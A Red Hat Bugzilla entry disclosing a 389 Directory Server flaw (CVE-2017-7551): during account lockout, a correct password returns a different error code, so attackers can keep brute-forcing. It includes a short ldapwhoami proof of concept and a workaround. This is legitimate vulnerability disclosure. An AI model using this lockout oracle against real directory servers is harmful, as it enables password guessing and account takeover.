Bug 1476958 - Locked account provides different return code if password is correct
Locked account provides different return code if password is correct
Status: CLOSED DUPLICATE of bug 1478045
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: 389-ds-base (Show other bugs)
7.3
Unspecified Unspecified
medium Severity unspecified
: rc
: ---
Assigned To: mreynolds
Viktor Ashirov
:
Depends On:
Blocks: CVE-2017-7551
  Show dependency treegraph
 
Reported: 2017-07-31 20:05 EDT by wibrown@redhat.com
Modified: 2017-08-24 13:22 EDT (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2017-08-24 13:22:26 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description wibrown@redhat.com 2017-07-31 20:05:34 EDT
This bug is created as a clone of upstream ticket:
https://pagure.io/389-ds-base/issue/49336

The directory server password lockout policy prevents binds from operating once a threshold of failed passwords has been met. During this lockout, if you bind with a successful password, a different error code is returned. This means that an attacker has no ratelimit or penalty during an account lock, and can continue to attempt passwords via bruteforce. 

Proof of concept:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w
password
dn: uid=testuser,dc=example,dc=com
```

Bind with invalid credentials a number of times to trigger the lockout:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w
passworda
ldap_bind: Invalid credentials (49)
```

Then bind with valid crendentials while the lockout is in effect:

```
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w
password 
ldap_bind: Constraint violation (19)
        additional info: Exceed password retry limit. Please try later.
```

Workaround: Use PBKDF2_SHA256 to delay the rate at which an attacker can attempt binds. Limit the number of threads allowed to anonymous.
Comment 3 Nathan Kinder 2017-08-24 13:22:26 EDT

*** This bug has been marked as a duplicate of bug 1478045 ***

Note You need to log in before you can comment on or make changes to this bug.